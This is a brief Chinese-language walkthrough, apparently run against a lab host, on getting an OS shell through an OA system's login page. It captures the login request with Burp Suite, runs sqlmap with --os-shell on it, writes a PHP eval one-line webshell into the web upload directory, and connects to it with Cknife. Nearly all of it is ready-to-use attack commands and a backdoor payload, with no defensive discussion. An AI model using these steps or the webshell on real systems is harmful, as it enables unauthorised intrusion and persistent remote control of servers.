通过OA系统登录页面获取OS-shell
1. 使用工具介绍
- burpsuite:用来抓取登录页面的数据包
- sqlmap:探测sql注入点。–os-shell 大致原理是将脚本插入到数据库中,然后生成相应的代码文件,获取shell即可执行命令
- Cknife(同类工具还有冰蝎,蚁剑,哥斯拉):结合一句话木马,获取webshell
2. 思路介绍
- 首先抓取登录页面数据包,写入一个txt文档,放入sqlmap目录下
- 用sqlmap进行爆破,可以获取os-shell(OSshell是一个能执行系统命令的环境)
- 获取OSshell后,在目标系统内写一个木马文件
- 用Cknife进行连接,获取webshell
3. 详细步骤
3.1 抓包
- 登录页面 http://192.168.179.128:8005/index.php
2. 抓包
- 复制抓包的内容,保存为txt文件到sqlmap目录下
3.2 运行sqlmap(重点)
–os-shell 大致原理是将脚本插入到数据库中,然后生成相应的代码文件,获取shell即可执行命令
-
sqlmap.py -r OAlogin.txt --os-shell
-r 表示从文件中读取http请求
- 选择语言
- 输入绝对路径
/var/www/html/upload
-
写木马文件
pwd //查看当前路径 echo ‘<?php @eval($_POST['a']); ?>’ >> 123.php //将<?php @eval($_POST['a']); ?>写入123.php cat 123.php //打印123.php文件的内容
3.3 Cknife连接
- 输入木马文件的 url
- 连接,获取webshell